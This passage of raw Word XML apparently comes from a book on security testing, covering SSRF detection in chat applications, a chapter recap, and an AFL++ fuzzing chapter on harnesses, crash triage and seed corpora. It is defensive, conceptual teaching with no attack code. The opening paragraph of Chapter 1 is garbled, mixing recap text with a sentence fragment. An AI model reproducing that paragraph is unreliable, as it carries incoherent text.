        <w:t xml:space="preserve">Detection requires monitoring external request destinations and response content rather than just request success or failure. Track whether your application makes requests to internal network addresses, private IP ranges, or cloud metadata endpoints. Verify that URL validation prevents access to unauthorized network resources. Confirm that SSRF attacks actually access internal resources rather than just causing request errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SSRF vulnerabilities become particularly dangerous in chat applications because external content fetching often occurs with elevated network privileges in cloud environments. Internal network access through SSRF enables infrastructure reconnaissance, credential theft, and lateral movement within your deployment environment. Single malicious URLs can compromise your entire infrastructure through your chat application’s network position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic approach reveals whether your chat application’s external request handling properly validates and restricts request destinations to authorized external resources.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="120" w:name="Xe431e9d703aeed89a4b40c4290b79115cb7ae46"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter Recap: Mastering Chat Application Security Through Systematic Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ve developed comprehensive expertise in discovering security vulnerabilities within chat application code you wrote and control. Beginning with message content injection vulnerabilities that affect user-facing features, you progressed through prototype pollution attacks using real CVEs like dset, authentication bypasses through type confusion, performance traps in input validation, template injection enabling code execution, and SSRF attacks targeting internal networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Your Security Testing Transformation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The systematic approach fundamentally changes how you think about chat application security. Instead of hoping manual testing catches security vulnerabilities, you now systematically explore attack vectors specific to chat features: user authentication and room access control, message processing and content rendering, template handling and external content fetching, input validation and performance characteristics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application now benefits from security testing specifically designed for the unique attack surfaces present in real-time communication platforms. Authentication bypass testing targets room permission logic you implemented. Message injection testing discovers vulnerabilities in content processing you designed. Template injection testing reveals code execution risks in notification systems you built. SSRF testing exposes network access issues in content fetching you architected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chat Application Security Expertise Achieved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can now assess your chat application’s security posture based on actual implementation architecture rather than generic web application security checklists. Your testing focuses on vulnerabilities in code you control: permission checking functions, message validation logic, template processing components, external request handling, and input validation systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This targeted approach provides immediate actionable results rather than theoretical security advice. You discover authentication bypasses in room access control within minutes of systematic testing. Message rendering vulnerabilities become apparent through systematic injection testing. Template injection risks reveal themselves through systematic payload testing. Each discovery represents a vulnerability you can fix immediately because it exists in code you wrote.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Chat Application Security Advantage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most chat application developers rely on generic web application security tools that don’t understand chat-specific attack vectors: room permission models, real-time message processing, template-based notifications, or external content integration. Your systematic testing approach discovers vulnerabilities specific to chat application features that generic security scanners miss entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">While other development teams discover chat application security issues through production incidents, expensive penetration testing, or user reports, you find vulnerabilities during development through systematic testing approaches that run continuously in your development workflow. This early discovery prevents security incidents while maintaining development velocity and user trust.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="120"/>
    <w:bookmarkStart w:id="121" w:name="X665d5693d146c0163d151d25dbc51e5070cd62d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Steps: Scaling Chat Application Security Across Development Teams</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your chat application now benefits from systematic security testing tailored to real-time communication platform vulnerabilities, but individual security testing efforts need coordination to protect your entire chat application ecosystem. One developer securing their chat features provides immediate value; an entire development organization preventing chat application security incidents creates sustainable competitive advantages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 8 demonstrates how to scale the individual chat application security testing techniques you’ve mastered into automated pipelines serving multiple development teams efficiently. You’ll discover how to package chat application security testing capabilities into Docker containers providing consistent testing environments, integrate vulnerability discovery into CI/CD systems maintaining development velocity while ensuring security coverage, and build monitoring systems tracking security improvement across your entire chat application development portfolio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The authentication bypass, message injection, and template injection discovery techniques you’ve learned will scale to organization-wide chat application security programs through automation, orchestration, and intelligent resource management. Your individual expertise in securing chat application features becomes the foundation for systematic vulnerability prevention across every real-time communication platform your organization deploys.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="121"/>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:id="140" w:name="Xd1f8119cebce300925fe3e25b3bc016998efc77"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 1: Fuzzing Bootcamp - Your First Vulnerability Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The journey from basic crash discovery to comprehensive reliability testing has begun, and your most impactful discoveries lie ahead. You’ve mastered the foundation—​now it’s time to build upon it with advanced techniques that will transform how you think about application reliability and systematic vulnerability discovery. moment you realize your application can crash in ways you never imagined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Picture this: you’ve just deployed what you believe is rock-solid code to production. Your unit tests pass, integration tests look good, and code review caught the obvious issues. Then, three hours later, your monitoring dashboard lights up red. Service outage. Memory corruption. A single malformed input brought down your entire application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This scenario plays out thousands of times every day across the software industry. Despite our best testing efforts, applications fail in spectacular ways when confronted with unexpected input. The root cause? We test what we expect, not what we fear.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Welcome to the world of modern fuzz testing—​where we systematically explore the dark corners of our applications to find crashes before our users do. By the end of this chapter, you’ll discover your first real vulnerability using AFL++, understand why coverage-guided fuzzing revolutionizes reliability testing, and build the foundation for preventing service outages through systematic crash discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your journey begins with a single goal: finding a crash within thirty minutes. This isn’t theoretical—​you’ll actually break something, understand why it broke, and learn how to prevent similar failures in production.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="123" w:name="X1a3bbb0bacda1b1032f014edcf8e38d3fcc0519"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Hidden Reality of Application Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your application lives in a hostile world. Every input it processes represents a potential attack vector against your service’s stability. HTTP requests carry malformed headers. Configuration files contain unexpected encoding. User uploads hide malicious payloads. API calls arrive with boundary-crossing parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traditional testing approaches, no matter how thorough, explore only a tiny fraction of possible input combinations. Consider a simple JSON parser handling user registration data. You test valid JSON processing and obviously malformed JSON rejection. But what happens when someone submits JSON with deeply nested objects that exhaust your parser’s recursion limit? Your manual tests never explored that scenario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The mathematics reveal the fundamental inadequacy of traditional approaches. A simple input with just 100 bytes contains 256^100 possible combinations—​more than the number of atoms in the observable universe. Even testing one million combinations per second would require longer than the age of the universe to explore them all.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This vast unexplored space between "obviously correct" and "obviously wrong" inputs harbors the crashes that bring down production systems. Manual testing will never find them. Random testing might stumble across them accidentally after running for years. Coverage-guided fuzzing finds them systematically within hours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve just learned why traditional testing fails against real-world input complexity.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now let’s understand how AFL++ solves this problem through intelligent exploration rather than brute force.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkStart w:id="124" w:name="X9e17b51c0323b30675c8c7bb176dfd6a16a733f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding Coverage-Guided Crash Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AFL++ transforms mindless mutation into intelligent exploration through a sophisticated feedback loop. Instead of throwing random data at your application hoping for crashes, AFL++ tracks which parts of your code execute during each test. When it discovers an input that reaches previously unexplored code paths, it marks that input as "interesting" and uses it as a foundation for generating new test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This coverage-guided approach creates exponential improvements in crash discovery effectiveness. Traditional random testing generates millions of invalid inputs that your application’s input validation rejects immediately. AFL++ starts with valid inputs, then systematically explores variations that maintain enough validity to reach deeper code paths while introducing the subtle corruption that triggers crashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The feedback mechanism works through compile-time instrumentation that embeds lightweight monitoring directly into your application’s executable code. Every basic block—​the fundamental units of program execution—​receives a unique identifier. As your application runs, AFL++ records which basic blocks execute and in what sequence, building a comprehensive map of code coverage for each test input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When AFL++ mutates an input and discovers that the mutation reaches new basic blocks, it adds that input to its queue for further exploration. This creates a self-reinforcing cycle where successful mutations beget more successful mutations, systematically expanding coverage into previously unexplored code regions where crashes often hide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The beauty of this approach lies in its ability to maintain semantic validity while exploring edge cases. AFL++ doesn’t need to understand your input format—​it learns the structure through trial and error, discovering which mutations preserve validity and which cause immediate rejection. Over time, it builds an implicit understanding of your input format’s structure and uses that knowledge to generate increasingly sophisticated test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You witness this intelligence in action when AFL++ discovers that flipping certain bits breaks input validation while flipping others reaches deeper parsing logic. The fuzzer learns from each failed attempt, gradually building expertise about your application’s input processing behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You now understand how AFL++ uses coverage feedback to guide intelligent exploration rather than random testing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Next, we’ll set up the environment where you’ll experience this intelligence firsthand.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:id="125" w:name="Xb84d2ba9d85a07c2d80c73d9bf4455a309089c2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setting Up Your Crash Discovery Environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before you start finding crashes, you need a reliable, reproducible environment that isolates your fuzzing activities from your development system. Docker provides the perfect foundation for this isolation, ensuring your fuzzing setup works consistently across different machines while preventing any accidental contamination of your development environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The containerized approach offers significant advantages beyond simple isolation. Docker enables rapid iteration on fuzzing configurations, easy sharing of working setups across team members, and trivial cleanup after intensive fuzzing campaigns. When you’re generating millions of test cases and potentially triggering hundreds of crashes, the ability to reset your environment completely with a single command becomes invaluable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll build a Docker setup that includes AFL++ with all necessary instrumentation tools, debugging utilities for crash analysis, and a complete development environment optimized for vulnerability discovery. This foundation supports both initial learning and eventual scaling to production-grade fuzzing operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The containerized environment eliminates the most common AFL++ setup pitfalls that can derail initial fuzzing attempts. Missing dependencies vanish when you use a known-good container image. Incorrect compiler configurations become impossible when the container includes pre-configured toolchains. Filesystem permission issues disappear when you mount directories with appropriate access controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Beyond the basic AFL++ installation, your environment includes AddressSanitizer for enhanced crash detection, Valgrind for memory error analysis, and GDB for interactive debugging. This complete toolkit ensures you can not only find crashes but also analyze them effectively to understand their impact on service reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll verify your environment setup by running a simple AFL++ test campaign against a known vulnerable target. This verification step confirms that your instrumentation works correctly, your compiler produces instrumented binaries, and your monitoring tools capture crash information properly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve now prepared a professional fuzzing environment that eliminates setup complications and enables immediate crash discovery.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Let’s use this environment to find your first vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="125"/>
    <w:bookmarkStart w:id="126" w:name="Xbc1a1b949313260fa0551c2bfd87755d64fc586"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your First Vulnerability Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now comes the moment you’ve been waiting for—​actually finding a crash. You’ll start with a deliberately vulnerable application that contains memory corruption bugs typical of real-world software. This approach ensures you experience the satisfaction of crash discovery immediately, building confidence before tackling more complex targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The target application processes image metadata from uploaded files—​a common scenario in web applications that often contains subtle security vulnerabilities. Image parsing code frequently deals with complex file formats, dynamic memory allocation, and untrusted input, creating perfect conditions for memory corruption bugs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll work with an application that contains several typical flaws: buffer overflows in header parsing, integer overflows in size calculations, and use-after-free conditions in error handling paths. These bugs represent real vulnerability classes found in production applications, not artificial academic examples designed purely for educational purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Creating an AFL++ harness transforms this vulnerable application into a fuzzing target. The harness serves as the bridge between AFL++'s test case generation and your application’s input processing logic. You’ll build a simple wrapper that reads fuzzer-generated input and feeds it to your target function.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The harness pattern remains consistent across all AFL++ fuzzing campaigns: read input data, call your target function, handle any errors gracefully. This simplicity enables rapid development of fuzzing campaigns for new targets without complex infrastructure requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll prepare a seed corpus of valid image files that provide good initial coverage of your target application’s parsing logic. The corpus quality dramatically affects AFL++ effectiveness—​diverse, realistic inputs guide the fuzzer toward interesting code paths more efficiently than minimal synthetic examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Starting AFL++ begins the systematic exploration process that will discover vulnerabilities within minutes. You’ll watch as AFL++ transforms your valid seed inputs through systematic mutation: flipping individual bits, inserting random bytes, truncating sections, and splicing different inputs together. Each mutation receives immediate testing, with successful mutations that increase coverage saved for further exploration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within minutes of starting AFL++, you’ll witness your first crash discovery. The terminal output shows AFL++ systematically exploring new code paths, tracking coverage statistics, and ultimately discovering input combinations that cause your application to crash. This moment—​watching AFL++ find a real vulnerability autonomously—​demonstrates the power of coverage-guided fuzzing in a way that no theoretical explanation can match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll see AFL++ create a "crashes" directory containing the exact input that triggered the failure. This deterministic reproduction capability distinguishes fuzzing-discovered crashes from intermittent bugs that disappear when you try to investigate them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You’ve just discovered your first vulnerability using AFL++ and experienced the systematic exploration process that makes coverage-guided fuzzing so effective.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Now you need to understand what this crash means for your application’s reliability.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="126"/>
    <w:bookmarkStart w:id="127" w:name="X86a76d6505b3c1fab0655120ce582fdc3cb55f5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyzing Your First Crash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding the crash is just the beginning. Understanding what went wrong, why it happened, and how it impacts service reliability requires systematic crash analysis. The skills you develop analyzing your first AFL++ crash will serve you throughout your fuzzing journey, enabling rapid triage of complex vulnerabilities in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AFL++ saves every crashing input it discovers, along with metadata about the crash type and location. This crash corpus becomes a treasure trove of information about your application’s failure modes. Each crash represents a potential service outage—​understanding these failures prevents them from occurring in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You begin crash analysis with reproduction using the exact input that AFL++ discovered. This reproducibility enables deterministic analysis that you can repeat across different environments and debugging configurations. Load the crashing input into your debugger and watch the failure occur in controlled conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AddressSanitizer output provides the critical details you need for impact assessment: the exact memory violation type, the precise memory address involved, and the complete stack trace leading to the crash. This information enables rapid classification of crashes by severity and exploitation potential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll learn to distinguish between different vulnerability classes that carry different reliability implications. Buffer overflows that occur during request processing represent critical service availability risks that require immediate attention. Memory leaks that accumulate over time can cause gradual service degradation that might manifest only under sustained load. Use-after-free conditions might enable arbitrary code execution if attackers can control the freed memory contents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding these differences guides your response priorities effectively. Crashes triggered by external input demand urgent remediation because attackers can weaponize them immediately. Crashes that occur only during error handling might receive lower priority since they require specific failure conditions to trigger. Crashes in security-critical contexts require urgent attention regardless of their triggering conditions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The stack trace reveals the execution path that led to the crash, providing crucial context for understanding the root cause. Functions involved in parsing external input often represent the most critical attack surface since they process untrusted data directly. Crashes that occur deep in library code might indicate subtle bugs in dependency management or unexpected interaction between components.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll discover that modern applications rarely crash due to single-line programming errors. Most crashes result from complex interactions between multiple code paths, making them difficult to discover through traditional testing approaches. AFL++ excels at finding these interaction bugs by systematically exploring combinations of program states that manual testing would never encounter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Your analysis process determines whether each crash represents a genuine threat to service stability or a theoretical vulnerability with minimal practical impact. You verify that crashes occur consistently across different environments and configurations, ruling out environmental factors that might mask the true nature of the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">You now understand how to analyze AFL++ crashes systematically to determine their impact on service reliability and prioritize remediation efforts accordingly.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Let’s build on this knowledge to create more effective fuzzing campaigns.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="127"/>
    <w:bookmarkStart w:id="128" w:name="X5ad30dda38340a493f2b9f9e5e1dbd1aefe3eef"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building Effective Seed Corpora for Maximum Crash Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The quality of your initial seed corpus dramatically influences AFL++ effectiveness. Well-chosen seeds provide comprehensive code coverage while maintaining reasonable file sizes for efficient mutation. Poor corpus selection limits AFL++ to exploring only shallow code paths, missing the deep vulnerabilities that matter most for service reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effective seed selection requires understanding your application’s input format structure. Image parsers benefit from diverse image types that exercise different format specifications, color depth handling, compression algorithms, and metadata structures. Each variation opens different code paths for AFL++ exploration, increasing the probability of discovering format-specific vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real-world files generally provide better coverage than artificially constructed minimal examples. Production applications handle realistic inputs, and realistic inputs reveal realistic failure modes that actually threaten service stability. However, massive files can slow AFL++ mutation significantly, requiring you to balance coverage benefits against performance costs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You’ll learn corpus curation techniques that maximize coverage while optimizing performance. Start with diverse, realistic examples that exercise different code paths through your application. Remove redundant files that don’t contribute unique coverage. Minimize file sizes while preserving structural diversity that enables effective mutation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Corpus quality measurement involves coverage analysis that ensures your seeds exercise diverse code paths through your target application. Areas of your application that never execute during corpus processing will remain unexplored during fuzzing, potentially hiding critical vulnerabilities in unexercised code regions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You monitor corpus effectiveness through AFL++ coverage statistics that reveal which portions of your application receive thorough exploration and which areas remain untested. This feedback enables iterative corpus improvement as you identify and address coverage gaps through targeted seed selection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dynamic corpus improvement occurs naturally as AFL++ discovers interesting inputs during fuzzing campaigns. Inputs that trigger new coverage automatically join the corpus, expanding exploration into previously unreachable code regions. This self-improving behavior distinguishes coverage-guided fuzzing from static testing approaches that cannot adapt to discovered program behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The corpus serves as institutional memory for your fuzzing campaigns. Once AFL++ discovers interesting inputs for a particular application, those inputs can seed future fuzzing sessions, enabling incremental improvement over time. Teams often maintain shared corpus repositories that accumulate fuzzing knowledge across multiple campaigns and team members.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
